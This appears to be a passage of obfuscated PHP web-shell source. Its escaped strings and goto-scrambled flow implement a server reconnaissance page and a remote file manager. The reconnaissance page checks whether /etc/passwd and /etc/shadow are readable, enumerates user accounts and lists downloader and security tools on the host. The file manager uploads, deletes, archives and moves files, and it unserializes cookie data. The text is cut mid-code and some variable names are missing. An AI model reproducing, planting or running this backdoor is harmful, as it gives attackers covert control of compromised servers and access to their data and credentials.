"\74\x68\x31\x3e\x53\x65\162\x76\145\162\x20\x73\145\x63\165\162\151\164\x79\40\x69\156\x66\157\162\x6d\141\164\x69\x6f\156\x3c\x2f\150\x31\x3e\x3c\144\151\x76\40\143\154\x61\163\x73\75\x63\x6f\x6e\164\x65\156\164\x3e"; function showSecParam($n, $v) { $v = trim($v); if ($v) { echo "\x3c\163\x70\x61\x6e\76" . $n . "\72\40\74\57\163\160\141\x6e\76"; if (strpos($v, "\xa") === false) { echo $v . "\74\142\x72\76"; } else { echo "\74\x70\x72\x65\x20\x63\x6c\141\x73\163\75\155\154\61\76" . $v . "\74\57\160\x72\x65\x3e"; } } } showSecParam("\123\x65\162\x76\145\x72\40\163\157\x66\164\167\x61\x72\145", @getenv("\123\x45\122\x56\x45\122\x5f\123\117\x46\124\x57\101\122\x45")); if (function_exists("\141\160\141\143\150\x65\137\147\x65\164\137\155\157\144\165\x6c\x65\163")) { showSecParam("\x4c\157\141\x64\145\144\40\x41\160\x61\x63\x68\145\40\x6d\x6f\x64\165\154\x65\163", implode("\54\40", apache_get_modules())); } showSecParam("\104\151\x73\141\x62\x6c\x65\x64\40\120\110\x50\x20\x46\165\156\143\x74\x69\157\156\163", $GLOBALS["\144\151\x73\x61\142\x6c\x65\x5f\x66\x75\156\143\164\x69\157\156\163"] ? $GLOBALS["\x64\151\x73\x61\142\154\x65\137\x66\x75\x6e\143\x74\x69\x6f\x6e\163"] : "\x6e\x6f\156\145"); showSecParam("\x4f\160\145\156\40\142\141\163\145\40\144\x69\162", @ini_get("\157\160\145\x6e\x5f\x62\141\x73\x65\x64\x69\162")); showSecParam("\x53\x61\x66\x65\x20\155\x6f\x64\145\40\145\x78\x65\x63\x20\144\x69\x72", @ini_get("\163\x61\146\x65\x5f\155\157\144\x65\x5f\145\x78\145\x63\137\144\x69\x72")); showSecParam("\x53\x61\x66\x65\40\x6d\x6f\x64\x65\x20\151\156\x63\x6c\x75\x64\145\x20\144\151\x72", @ini_get("\x73\x61\x66\x65\137\x6d\x6f\x64\145\137\151\x6e\143\x6c\165\144\x65\137\x64\x69\162")); showSecParam("\143\125\122\x4c\40\x73\x75\160\x70\157\162\x74", function_exists("\x63\165\162\154\x5f\166\x65\162\163\151\x6f\156") ? "\x65\156\141\x62\x6c\145\x64" : "\156\x6f"); $temp = array(); if (function_exists("\x6d\x79\163\x71\154\137\147\x65\x74\137\143\x6c\151\x65\156\164\137\x69\x6e\x66\x6f")) { $temp[] = "\x4d\x79\x53\x71\x6c\x20\50" . mysql_get_client_info() . "\x29"; } if (function_exists("\155\x73\163\161\154\x5f\143\157\x6e\x6e\x65\143\164")) { $temp[] = "\115\x53\123\x51\114"; } if (function_exists("\x70\x67\x5f\x63\x6f\x6e\x6e\145\x63\164")) { $temp[] = "\120\x6f\x73\164\x67\x72\x65\x53\x51\x4c"; } if (function_exists("\x6f\x63\x69\x5f\143\x6f\156\156\145\143\x74")) { $temp[] = "\x4f\x72\x61\143\154\145"; } showSecParam("\x53\165\160\160\157\x72\164\x65\x64\x20\144\x61\164\x61\x62\x61\x73\x65\x73", implode("\54\x20", $temp)); echo "\x3c\x62\162\x3e"; if ($GLOBALS["\x6f\163"] == "\x6e\151\x78") { showSecParam("\122\x65\x61\144\x61\x62\x6c\145\x20\x2f\145\164\x63\57\160\x61\163\163\x77\x64", @is_readable("\x2f\145\164\x63\x2f\160\x61\x73\163\x77\x64") ? "\171\x65\163\40\74\141\x20\150\x72\145\146\75\x27\x23\x27\40\157\156\143\154\151\143\x6b\x3d\x27\147\x28\x22\106\151\x6c\145\x73\124\157\x6f\x6c\163\42\x2c\40\42\57\145\164\143\x2f\x22\x2c\x20\x22\x70\x61\163\x73\x77\x64\x22\x29\x27\x3e\133\166\151\x65\167\135\74\57\141\76" : "\x6e\157"); showSecParam("\x52\145\x61\144\141\142\154\x65\40\57\x65\x74\x63\x2f\163\150\141\144\157\167", @is_readable("\x2f\145\x74\143\57\x73\150\141\144\157\167") ? "\171\145\x73\40\x3c\141\x20\150\162\145\x66\x3d\x27\x23\x27\x20\157\x6e\x63\154\x69\x63\x6b\x3d\x27\x67\50\42\106\151\154\145\163\124\157\x6f\154\163\x22\54\x20\x22\x2f\x65\164\x63\x2f\x22\54\x20\x22\x73\x68\141\144\x6f\x77\42\51\47\x3e\133\x76\x69\x65\x77\135\74\57\x61\x3e" : "\156\157"); showSecParam("\x4f\123\x20\166\145\162\x73\x69\157\156", @file_get_contents("\x2f\x70\162\157\143\57\166\x65\162\163\151\x6f\156")); showSecParam("\x44\x69\x73\x74\162\x20\x6e\141\x6d\x65", @file_get_contents("\x2f\145\x74\x63\x2f\x69\163\x73\165\x65\x2e\156\145\164")); if (!$GLOBALS["\x73\141\x66\145\x5f\x6d\157\x64\145"]) { $userful = array("\147\x63\143", "\x6c\143\143", "\143\143", "\154\144", "\x6d\141\153\x65", "\x70\x68\160", "\x70\145\x72\x6c", "\160\x79\x74\x68\x6f\156", "\162\x75\142\171", "\x74\x61\162", "\147\172\151\x70", "\x62\172\151\x70", "\142\172\151\160\62", "\156\143", "\154\157\143\141\x74\x65", "\x73\x75\151\x64\x70\x65\x72\154"); $danger = array("\x6b\x61\166", "\156\x6f\144\63\62", "\142\144\x63\x6f\162\x65\144", "\165\166\x73\143\x61\x6e", "\x73\141\166", "\x64\x72\167\145\142\x64", "\143\154\141\x6d\144", "\162\153\150\165\x6e\x74\x65\x72", "\x63\x68\x6b\162\x6f\x6f\164\x6b\151\164", "\x69\x70\164\141\x62\x6c\145\x73", "\151\x70\x66\x77", "\164\162\151\x70\x77\x69\162\145", "\163\150\x69\x65\154\144\x63\x63", "\160\157\x72\x74\x73\145\156\164\162\x79", "\x73\x6e\157\x72\164", "\x6f\163\163\x65\143", "\x6c\x69\x64\x73\x61\144\155", "\164\143\x70\x6c\x6f\144\147", "\x73\170\x69\144", "\154\157\147\x63\150\x65\143\x6b", "\x6c\x6f\x67\x77\141\164\x63\x68", "\163\171\x73\155\x61\163\153", "\172\155\x62\x73\143\x61\160", "\x73\141\167\x6d\151\154\154", "\167\x6f\162\x6d\x73\143\x61\156", "\156\x69\x6e\152\141"); $downloaders = array("\x77\x67\145\164", "\146\x65\164\x63\x68", "\x6c\171\x6e\170", "\x6c\151\x6e\153\x73", "\143\165\x72\x6c", "\x67\x65\164", "\x6c\167\x70\55\x6d\x69\162\x72\x6f\x72"); echo "\x3c\x62\x72\x3e"; $temp = array(); foreach ($userful as $) { if (which($)) { $temp[] = $; } } showSecParam("\125\163\x65\162\x66\165\x6c", implode("\54\40", $temp)); $temp = array(); foreach ($danger as $) { if (which($)) { $temp[] = $; } } showSecParam("\104\x61\x6e\147\145\162", implode("\54\40", $temp)); $temp = array(); foreach ($downloaders as $) { if (which($)) { $temp[] = $; } } showSecParam("\104\157\x77\156\x6c\157\141\x64\145\162\163", implode("\54\40", $temp)); echo "\x3c\x62\162\x2f\76"; showSecParam("\110\x44\104\x20\163\x70\141\x63\145", ex("\x64\x66\x20\55\150")); showSecParam("\x48\x6f\x73\164\x73", @file_get_contents("\57\145\x74\143\57\150\157\163\164\x73")); showSecParam("\115\157\x75\156\x74\40\157\x70\x74\x69\x6f\x6e\163", @file_get_contents("\57\145\164\x63\x2f\146\163\x74\141\142")); } } else { showSecParam("\117\x53\40\x56\145\x72\163\x69\157\156", ex("\x76\145\x72")); showSecParam("\101\x63\143\x6f\x75\156\164\x20\x53\145\164\164\151\156\147\x73", iconv("\103\120\70\x36\x36", "\125\x54\106\x2d\x38", ex("\156\145\x74\x20\x61\143\143\x6f\165\x6e\164\x73"))); showSecParam("\x55\163\145\x72\40\101\x63\143\157\x75\156\164\163", iconv("\x43\120\x38\x36\x36", "\x55\x54\x46\55\x38", ex("\x6e\x65\x74\40\165\x73\x65\162"))); } echo "\74\x2f\x64\x69\166\76"; hardFooter(); } goto h3psb; vmP50: if ($os == "\167\151\156") { $home_cwd = str_replace("\x5c", "\57", $home_cwd); $cwd = str_replace("\x5c", "\x2f", $cwd); } goto f_hzt; bY27C: function actionFilesMan() { if (!empty($_COOKIE["\x66"])) { $_COOKIE["\x66"] = @unserialize($_COOKIE["\x66"]); } if (!empty($_POST["\160\61"])) { switch ($_POST["\x70\61"]) { case "\x75\160\154\157\x61\144\106\151\154\x65": if (is_array($_FILES["\146"]["\x74\x6d\160\x5f\x6e\141\155\x65"])) { foreach ($_FILES["\x66"]["\164\x6d\x70\137\156\141\x6d\x65"] as $i => $tmpName) { if (!@move_uploaded_file($tmpName, $_FILES["\146"]["\156\141\155\145"][$i])) { echo "\103\141\156\x27\x74\x20\x75\x70\x6c\x6f\x61\144\x20\146\x69\154\145\41"; } } } break; case "\155\153\144\151\x72": if (!@mkdir($_POST["\x70\x32"])) { echo "\103\x61\156\47\x74\40\143\x72\145\x61\164\145\40\156\x65\167\40\x64\151\x72"; } break; case "\x64\x65\154\145\x74\145": function deleteDir($path) { $path = substr($path, -1) == "\57" ? $path : $path . "\x2f"; $dh = opendir($path); while (($ = readdir($dh)) !== false) { $ = $path . $; if (basename($) == "\56\x2e" || basename($) == "\56") { continue; } $type = filetype($); if ($type == "\144\x69\162") { deleteDir($); } else { @unlink($); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["\x66"])) { foreach ($_POST["\x66"] as $f) { if ($f == "\x2e\56") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "\x70\x61\x73\x74\x65": if ($_COOKIE["\141\x63\x74"] == "\143\157\x70\171") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "\x2e" and $f != "\56\x2e") { copy_paste($c . $s . "\57", $f, $d . $s . "\57"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["\146"] as $f) { copy_paste($_COOKIE["\143"], $f, $GLOBALS["\x63\167\144"]); } } elseif ($_COOKIE["\x61\x63\164"] == "\x6d\157\166\x65") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "\56" and $f != "\56\x2e") { copy_paste($c . $s . "\57", $f, $d . $s . "\57"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["\146"] as $f) { @rename($_COOKIE["\143"] . $f, $GLOBALS["\x63\167\x64"] . $f); } } elseif ($_COOKIE["\x61\143\x74"] == "\x7a\x69\x70") { if (class_exists("\x5a\151\160\x41\x72\x63\150\151\166\x65")) { $zip = new ZipArchive(); if ($zip->open($_POST["\160\62"], 1)) { chdir($_COOKIE["\x63"]); foreach ($_COOKIE["\146"] as $f) { if ($f == "\56\x2e") { continue; } if (@is_file($_COOKIE["\143"] . $f)) { $zip->addFile($_COOKIE["\143"] . $f, $f); } elseif (@is_dir($_COOKIE["\x63"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "\57", FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["\143\x77\144"]); $zip->close(); } } } elseif ($_COOKIE["\x61\x63\x74"] == "\165\156\172\x69\x70") { if (class_exists("\x5a\x69\x70\101\x72\x63\150\151\166\x65")) { $zip = new ZipArchive(); foreach ($_COOKIE["\146"] as $f) { if ($zip->open($_COOKIE["\143"] . $f)) { $zip->extractTo($GLOBALS["\143\167\x64"]); $zip->close(); } } } } elseif ($_COOKIE["\x61\x63\164"] == "\164\x61\x72") { chdir($_COOKIE["\143"]); $_COOKIE["\146"] = array_map("\145\x73\143\141\160\145\x73\150\145\154\x6c\141\162\147", $_COOKIE["\146"]); ex("\164\141\162\x20\143\146\x7a\x76\x20" . escapeshellarg($_POST["\x70\x32"]) . "\40" . implode("\x20", $_COOKIE["\146"])); chdir($GLOBALS["\143\x77\144"]); } unset($_COOKIE["\x66"]); setcookie("\146", '', time() - 3600); break; default: if (!empty($_POST["\x70\61"])) { prototype("\141\x63\x74", $_POST["\x70\61"]); prototype("\146", serialize(@$_POST["\146"])); prototype("\x63", @$_POST["\x63"]); } break; } } hardHeader(); echo "\x3c\x68\x31\x3e\106\x69\x6c\145\40\x6d\141\156\x61\147\x65\x72\x3c\57\x68\61\x3e\x3c\x64\x69\166\x20\x63\x6c\x61\163\163\75\143\157\x6e\164\145\156\x74\x3e\x3c\x73\143\x72\151\x70\164\x3e\160\x31\x5f\x3d\x70\x32\x5f\x3d\x70\63\137\x3d\42\x22\73\74\57\x73\x63\162\151\160\164\x3e"; $dirContent = hardScandir(isset($_POST["\143"]) ? $_POST["\x63"] : $GLOBALS["\143\167\144"]); if ($dirContent === false) { echo "\103\x61\x6e\47\164\x20\x6f\x70\x65\x6e\40\x74\x68\x69\163\x20\146\x6f\154\x64\145\x72\x21"; hardFooter(); return; } global $sort; $sort = array("\156\x61\x6d\x65", 1); if (!empty($_POST["\160\61"])) { if (preg_match("\41\163\x5f\50\133\x41\55\172\x5d\x2b\51\x5f\x28\x5c\x64\x7b\x31\x7d\51\41", $_POST["\160\x31"], $match)) { $sort = array($match[1], (int) $match[2]); } } echo "\x3c\x73\x63\x72\151\x70\x74\x3e\xa\11\x66\x75\156\143\164\x69\x6f\x6e\x20\x73\x61\x28\51\40\x7b\xa\x9\x9\146\x6f\162\50\151\75\60\73\151\x3c\144\56\x66\151\154\145\x73\x2e\145\x6c\145\x6d\x65\156\x74\x73\x2e\154\x65\156\147\164\150\x3b\x69\x2b\53\x29\12\11\11\x9\x69\x66\x28\x64\x2e\146\151\x6c\x65\163\x2e\x65\154\x65\x6d\145\x6e\164\163\x5b\x69\x5d\56\x74\171\x70\145\40\x3d\75\40\x27\143\x68\x65\143\153\x62\x6f\x78\x27\51\12\11\x9\x9\11\144\x2e\146\x69\x6c\x65\163\56\145\x6c\x65\155\145\x6e\x74\163\x5b\151\x5d\x2e\x63\150\x65\x63\153\145\144\40\x3d\40\144\56\146\x69\154\145\x73\56\x65\x6c\x65\x6d\x65\x6e\164\163\x5b\60\135\56\143\x68\x65\143\x6b\x65\144\x3b\xa\11\175\xa\74\x2f\163\143\x72\151\160\x74\x3e\xa\74\164\141\142\154\145\x20\x77\x69\x64\x74\x68\75\x27\x31\60\60\x25\47\40\143\154\x61\x73\163\75\47\155\141\x69\x6e\x27\40\x63\x65\x6c\x6c\x73\x70\141\143\151\156\147\x3d\x27\60\x27\x20\x63\x65\x6c\x6c\x70\141\x64\x64\151\x6e\147\x3d\x27\x32\x27\76\xa\74\x66\157\162\x6d\40\156\x61\155\145\75\146\x69\154\x65\163\x20\155\145\x74\x68\157\144\75\160\x6f\163\x74\x3e\74\x74\x72\x3e\x3c\x74\150\x20\167\x69\x64\164\x68\75\47\x31\63\160\x78\x27\x3e\74\x69\x6e\x70\165\164\x20\x74\x79\160\x65\x3d\143\x68\x65\143\x6b\142\157\170\40\157\x6e\143\154\151\143\x6b\75\47\x73\141\x28\51\x27\40\x63\154\141\163\163\75\x63\x68\153\142\x78\x3e\x3c\57\164\x68\x3e\74\164\150\x3e\x3c\141\x20\x68\162\x65\x66\75\47\43\47\x20\x6f\x6e\x63\154\x69\x63\x6b\75\x27\x67\x28\x22\106\x69\154\145\x73\115\141\156\x22\x2c\x6e\165\154\x6c\54\x22\x73\x5f\x6e\x61\155\145\137" . ($sort[1] ? 0 : 1) . "\42\51\x27\x3e\116\141\x6d\145\x3c\57\141\76\74\x2f\x74\150\x3e\74\x74\150\76\74\141\x20\x68\x72\x65\146\x3d\47\43\x27\40\157\x6e\x63\154\151\143\153\75\47\147\x28\42\x46\x69\154\145\x73\x4d\141\156\x22\54\156\x75\154\x6c\54\x22\163\137\x73\x69\172\x65\x5f" . ($sort[1] ? 0 : 1) . "\x22\x29\x27\76\x53\151\172\x65\74\x2f\x61\76\74\57\164\150\76\x3c\164\x68\76\x3c\x61\x20\150\x72\145\146\75\47\x23\x27\40\157\x6e\x63\x6c\151\143\153\x3d\x27\147\50\x22\106\151\154\145\x73\115\x61\x6e\42\54\156\x75\x6c\x6c\54\x22\163\x5f\x6d\157\144\151\146\x79\137" . ($sort[1] ? 0 : 1) . "\42\x29\47\x3e\115\x6f\x64\151\146\x79\x3c\57\141\x3e\74\57\164\x68\76\74\x74\x68\x3e\x4f\x77\156\x65\x72\x2f\107\162\x6f\165\x70\74\x2f\x74\x68\x3e\x3c\x74\x68\76\74\x61\40\150\x72\145\146\x3d\x27\43\47\40\x6f\x6e\x63\154\151\x63\153\75\x27\147\50\42\106\151\154\x65\163\115\x61\x6e\x22\54\156\165\x6c\154\x2c\42\163\137\x70\x65\162\x6d\163\x5f" . ($sort[1] ? 0 : 1) . "\x22\51\x27\x3e\x50\x65\162\155\151\x73\x73\x69\x6f\156\163\x3c\57\141\x3e\74\x2f\164\150\x3e\74\164\150\76\101\143\164\151\157\x6e\163\74\57\x74\150\x3e\x3c\x2f\164\162\76"; $dirs = $files = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("\156\141\155\x65" => $dirContent[$i], "\160\141\x74\150" => $GLOBALS["\143\167\144"] . $dirContent[$i], "\155\157\144\x69\146\x79" => date("\x59\x2d\x6d\x2d\x64\x20\x48\72\x69\72\163", @filemtime($GLOBALS["\x63\x77\x64"] . $dirContent[$i])), "\x70\x65\x72\x6d\x73" => viewPermsColor($GLOBALS["\143\x77\x64"] . $dirContent[$i]), "\163\151\172\145" => @filesize($GLOBALS["\x63\167\144"] . $dirContent[$i]), "\157\x77\x6e\x65\162" => $ow["\156\x61\155\145"] ? $ow["\156\141\155\145"] : @fileowner($dirContent[$i]), "\x67\x72\x6f\x75\160" => $gr["\x6e\x61\155\145"] ? $gr["\156\x61\155\x65"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["\143\167\144"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("\164\171\160\145" => "\146\x69\154\x65")); } elseif (@is_link($GLOBALS["\x63\167\x64"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("\164\x79\x70\145" => "\154\151\156\x6b", "\x6c\151\156\153" => readlink($tmp["\x70\141\164\150"]))); } elseif (@is_dir($GLOBALS["\143\167\x64"] . $dirContent[$i]) && $dirContent[$i] != "\56") { $dirs[] = array_merge($tmp, array("\164\171\x70\145" => "\144\151\162")); } } $GLOBALS["\163\157\162\164"] = $sort; function cmp($a, $b) { if ($GLOBALS["\x73\x6f\x72\x74"][0] != "\163\151\172\145") { return strcmp(strtolower($a[$GLOBALS["\x73\157\x72\164"][0]]), strtolower($b[$GLOBALS["\x73\x6f\x72\164"][0]])) * ($GLOBALS["\163\157\162\x74"][1] ? 1 : -1); } else { return ($a["\x73\151\x7a\145"] < $b["\x73\151\172\x65"] ? -1 : 1) * ($GLOBALS["\163\x6f\x72\x74"][1] ? 1 : -1); } } usort($files, "\143\x6d\160"); usort($dirs, "\143\x6d\160"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo "\74\164\x72" . ($l ? "\40\143\154\141\163\x73\75\x6c\x31" : '') . "\76\x3c\164\144\76\74\x69\x6e\160\x75\x74\x20\x74\x79\160\x65\75\143\x68\x65\x63\153\142\x6f\170\40\x6e\141\155\145\x3d\42\146\x5b\x5d\42\x20\166\141\154\165\145\75\42" . urlencode($f["\156\141\155\x65"]) . "\x22\40\x63\x6c\141\x73\163\x3d\x63\150\153\142\170\x3e\x3c\x2f\164\x64\x3e\x3c\164\x64\x3e\x3c\x61\40\150\162\x65\146\x3d\x23\x20\157\156\x63\x6c\x69\x63\153\75\x22" . ($f["\x74\x79\x70\145"] == "\x66\x69\x6c\145" ? "\147\x28\x27\106\151\x6c\145\163\124\157\157\x6c\x73\x27\x2c\x6e\165\x6c\154\54\x27" . urlencode($f["\156\x61\x6d\145"]) . "\x27\x2c\x20\47\166\151\x65\167\x27\x29\x22\x3e" . htmlspecialchars($f["\156\141\155\x65"]) : "\147\x28\47\x46\151\x6c\145\x73\x4d\x61\x6e\47\54\x27" . $f["\160\141\164\x68"] . "\x27\x29\x3b\42\x20" . (empty($f["\154\151\x6e\153"]) ? '' : "\x74\x69\x74\x6c\145\x3d\47{$f["\x6c\x69\156\x6b"]}\x27") . "\76\74\142\x3e\x5b\x20" . htmlspecialchars($f["\156\x61\155\145"]) . "\40\x5d\x3c\57\142\x3e") . "\74\x2f\141\x3e\74\x2f\164\x64\76\74\164\144\x3e" . ($f["\x74\x79\160\145"] == "\x66\x69\x6c\x65" ? viewSize($f["\x73\x69\x7a\145"]) : $f["\164\x79\160\145"]) . "\74\x2f\164\x64\x3e\x3c\164\x64\76" . $f["\x6d\x6f\144\151\x66\x79"] . "\x3c\x2f\x74\x64\76\x3c\164\144\76" . $f["\x6f\x77\156\x65\x72"] . "\57" . $f["\147\x72\x6f\165\x70"] . "\x3c\x2f\164\144\76\x3c\x74\144\76\74\141\40\x68\x72\x65\146\x3d\43\40\x6f\x6e\x63\154\151\x63\x6b\x3d\42\147\x28\x27\x46\x69\x6c\x65\163\x54\157\x6f\154\x73\47\54\x6e\165\x6c\154\x2c\47" . urlencode($f["\156\141\x6d\x65"]) . "\x27\54\x27\x63\150\155\x6f\x64\x27\51\x22\76" . $f["\160\145\162\155\x73"] . "\x3c\57\164\144\x3e\x3c\x74\144\x3e\74\x61\40\x63\x6c\x61\x73\163\75\x22\164\x6f\157\x6c\x74\151\160\x22\x20\144\141\x74\x61\55\x74\157\x6f\154\164\151\x70\x3d\42\122\x65\x6e\141\x6d\x65\x22\40\x68\162\145\146\75\x22\43\42\x20\157\x6e\143\x6c\151\x63\x6b\x3d\x22\x67\50\x27\x46\x69\154\145\x73\x54\x6f\157\154\x73\x27\x2c\x6e\165\x6c\x6c\x2c\x27" . urlencode($f["\x6e\x61\x6d\145"]) . "\x27\x2c\40\x27\x72\145\x6e\x61\x6d\145\47\x29\42\x3e\x52\74\57\x61\x3e\40\x3c\x61\x20\143\x6c\x61\163\163\75\x22\x74\x6f\x6f\154\164\151\x70\42\40\144\x61\164\141\x2d\164\x6f\157\154\x74\x69\x70\75\42\x54\x6f\165\143\150\42\40\x68\x72\x65\146\75\x22\x23\42\40\157\x6e\143\154\x69\x63\x6b\75\42\147\50\47\x46\x69\x6c\x65\x73\124\157\157\154\163\x27\54\156\165\154\x6c\54\47" . urlencode($f["\x6e\x61\155\145"]) . "\47\54\40\47\x74\x6f\x75\x63\x68\47\x29\42\x3e\124\74\x2f\141\76" . ($f["\164\x79\160\145"] == "\x66\x69\154\x65" ? "\40\x3c\141\x20\143\154\141\x73\163\75\x22\164\x6f\157\x6c\x74\x69\x70\x22\40\144\x61\x74\141\55\164\157\157\x6c\x74\x69\x70\x3d\x22\x46\x72\x61\155\x65\x22\40\x68\162\145\x66\x3d\x22\x23\42\40\x6f\x6e\x63\154\151\143\x6b\75\x22\147\x28\x27\106\x69\x6c\x65\x73\x54\157\x6f\154\163\x27\54\x6e\165\x6c\x6c\x2c\x27" . urlencode($f["\156\141\x6d\145"]) . "\47\x2c\x20\47\146\162\x61\155\145\x27\51\42\x3e\106\x3c\x2f\x61\x3e\x20\74\x61\x20\x63\154\141\x73\x73\75\42\x74\x6f\x6f\154\x74\x69\x70\x22\x20\144\x61\164\141\55\164\157\157\x6c\x74\151\x70\75\42\x45\144\x69\164\42\x20\150\162\145\x66\75\x22\43\42\40\157\156\143\154\x69\143\153\x3d\42\x67\50\x27\106\x69\x6c\145\163\x54\157\157\x6c\x73\x27\54\156\x75\x6c\154\x2c\47" . urlencode($f["\x6e\141\x6d\145"]) . "\47\54\x20\x27\x65\144\x69\x74\47\51\42\76\x45\74\x2f\141\76\40\74\x61\x20\x63\x6c\141\163\163\75\42\x74\157\x6f\x6c\164\151\x70\42\x20\x64\x61\x74\141\55\x74\157\x6f\x6c\x74\x69\160\x3d\42\104\x6f\x77\x6e\x6c\x6f\x61\144\42\40\150\x72\x65\146\75\42\43\42\x20\157\156\x63\154\151\143\x6b\x3d\42\147\50\47\x46\x69\x6c\145\x73\124\157\157\154\163\47\54\156\x75\154\154\54\x27" . urlencode($f["\156\141\x6d\145"]) . "\47\54\x20\47\x64\157\167\x6e\x6c\157\141\144\47\51\x22\76\x44\74\57\x61\x3e" : '') . "\x3c\57\x74\144\x3e\74\57\164\x72\x3e"; $l = $l ? 0 : 1; } echo "\74\x74\162\x20\x69\x64\75\x66\x61\153\x3e\74\x74\144\40\143\157\x6c\163\x70\x61\156\75\67\x3e\12\11\x3c\x69\x6e\160\x75\164\x20\164\171\160\145\x3d\150\151\x64\x64\145\156\x20\x6e\x61\x6d\x65\x3d\156\x65\40\x76\x61\x6c\x75\145\75\x27\x27\x3e\xa\11\x3c\x69\156\160\165\x74\x20\x74\x79\x70\x65\x3d\x68\x69\144\144\x65\156\40\x6e\x61\x6d\x65\75\x61\40\166\141\154\165\x65\75\x27\x46\151\154\145\x73\115\141\156\x27\x3e\xa\x9\x3c\x69\x6e\x70\165\x74\x20\x74\171\160\x65\75\150\151\x64\144\x65\x6e\40\156\141\x6d\145\x3d\143\40\166\141\154\x75\145\x3d\x27" . htmlspecialchars($GLOBALS["\x63\x77\x64"]) . "\47\x3e\xa\11\x3c\151\x6e\x70\x75\x74\40\x74\x79\x70\145\x3d\x68\x69\x64\x64\x65\x6e\x20\156\x61\155\x65\75\x63\150\141\x72\x73\x65\164\40\166\x61\154\165\x65\x3d\x27" . (isset($_POST["\x63\x68\141\x72\163\x65\x74"]) ? $_POST["\x63\150\x61\162\163\x65\x74"] : '') . "\x27\76\12\11\74\154\x61\x62\x65\154\76\74\x73\145\x6c\145\143\164\40\156\141\155\x65\x3d\x27\x70\61\47\76"; if (!empty($_COOKIE["\x61\143\164"]) && @count($_COOKIE["\146"])) { echo "\x3c\x6f\x70\164\151\157\x6e\x20\166\x61\x6c\x75\x65\75\x27\x70\141\163\164\x65\x27\76\342\206\263\40\120\x61\163\x74\145\x3c\x2f\157\160\164\x69\x6f\156\76"; } echo "\74\157\x70\x74\151\157\156\x20\x76\141\x6c\x75\x65\75\47\x63\x6f\160\171\47\76\x43\157\x70\171\74\x2f\157\x70\x74\x69\x6f\156\76\x3c\157\x70\x74\x69\x6f\x6e\x20\166\x61\154\165\x65\x3d\47\155\x6f\166\x65\47\x3e\115\x6f\x76\145\x3c\x2f\x6f\x70\164\151\157\x6e\76\x3c\x6f\x70\x74\151\x6f\156\40\166\141\x6c\x75\145\75\47\x64\x65\154\145\164\x65\x27\x3e\x44\145\x6c\145\x74\x65\74\57\157\x70\x74\x69\157\156\76"; if (class_exists("\x5a\x69\160\101\162\143\x68\151\x76\145")) { echo "\x3c\x6f\x70\164\151\157\156\40\166\x61\x6c\165\x65\75\x27\x7a\x69\160\x27\x3e\53\40\172\x69\x70\74\x2f\157\160\x74\151\x6f\x6e\x3e\x3c\x6f\x70\164\x69\157\x6e\40\x76\x61\x6c\x75\x65\75\x27\x75\156\172\151\x70\x27\x3e\55\40\172\151\x70\x3c\57\157\x70\164\151\157\x6e\76"; } echo "\x3c\157\x70\164\151\x6f\x6e\x20\166\x61\154\x75\145\x3d\x27\x74\141\162\47\76\x2b\40\x74\141\162\x2e\147\172\74\x2f\157\x70\x74\x69\157\156\76"; echo "\74\57\x73\x65\x6c\x65\143\x74\x3e\74\57\x6c\141\142\145\x6c\76"; if (!empty($_COOKIE["\x61\143\164"]) && @count($_COOKIE["\146"]) && ($_COOKIE["\x61\143\164"] == "\x7a\x69\160" || $_COOKIE["\x61\143\164"] == "\x74\x61\162")) { echo "\x26\156\142\x73\160\73\x66\151\x6c\x65\x20\156\141\155\145\x3a\x20\x3c\x69\156\x70\165\x74\40\x74\171\x70\x65\x3d\164\x65\170\164\x20\156\141\155\x65\x3d\160\62\x20\x76\x61\154\165\x65\75\47\x68\141\x72\x64\137" . date("\131\155\144\137\x48\x69\x73") . "\x2e" . ($_COOKIE["\x61\x63\164"] == "\x7a\151\x70" ? "\172\151\160" : "\164\x61\x72\x2e\x67\172") . "\47\x3e\x26\156\x62\163\160\x3b"; } echo "\74\151\156\160\165\x74\x20\x74\171\x70\x65\75\47\163\165\x62\155\x69\164\47\40\166\141\x6c\165\x65\x3d\x27\x73\165\142\155\151\164\x27\x20\163\x74\171\x6c\145\75\x27\155\141\162\147\x69\x6e\x2d\154\145\146\x74\72\61\60\160\170\x27\76\74\57\x74\144\76\x3c\57\164\x72\76\74\57\x66\157\162\x6d\76\x3c\57\x74\141\x62\154\x65\76\x3c\57\x64\151\x76\76"; hardFooter(); } goto aQGQk; gkT1m: @ini_set("\x6d\141\x78\x5f\x65\170\x65\143\165\x74\x69\x6f\x6e\137\x74\x69\x6d\145", 0); goto poC4M; u_TFV: $ = true; goto oSUTr; p3F43: if (!isset($_COOKIE[md5($_SERVER["\x48\124\124\x50\137\x48\x4f\x53\x54"]) . "\153\x65\171"])) { prototype(md5($_SERVER["\110\124\124\120\x5f\110\117\123\124"]) . "\153\x65\x79", $); } goto UOKiC; aQGQk: function actionStringTools() { if (!function_exists("\150\x65\170\x32\142\x69\x6e")) { function hex2bin($p) { return decbin(hexdec($p)); } } if (!function_exists("\x62\151\156\150\x65\x78")) { function binhex($p) { return dechex(bindec($p)); } } if (!function_exists("\x68\x65\x78\62\141\163\143\x69\151")) { function hex2ascii($p) { $r = ''; for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } return $r; } } if (!function_exists("\x61\x73\143\x69\x69\62\x68\x65\x78")) { function ascii2hex($p) { $r = ''; for ($i = 0; $i < 